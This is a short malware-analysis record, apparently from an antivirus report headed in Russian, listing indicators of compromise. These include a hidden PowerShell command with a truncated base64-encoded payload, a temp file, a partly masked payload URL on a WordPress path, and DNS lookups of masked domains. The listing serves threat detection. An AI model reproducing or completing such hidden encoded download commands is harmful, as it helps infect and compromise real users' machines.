Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABMAHkAaQBuAGUAcABtAHgAcQB5AHUAbQA9ACcASgB3AHcAawBpAG0AcQBtAGcAJwA7ACQAVwBrAGkAeAB2AHcAdABjAHUAZgB2AGEAaAAgAD0AIAAnADQAMwA1ACcAOwAkAFMAcwBtAGoAcQB1AGYAbwBqAG0AZwBtAD0AJwBKAG4AcwB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1888
- %TEMP%\1213859.cvr
- 'fe###ede.com':80
- http://fe###ede.com/wp-content/danvv6/
- DNS ASK a0#.#gchen.com
- DNS ASK ph###ang##s.com
- DNS ASK 4c##ia.com
- DNS ASK bo#####horizontal.com
- DNS ASK fe###ede.com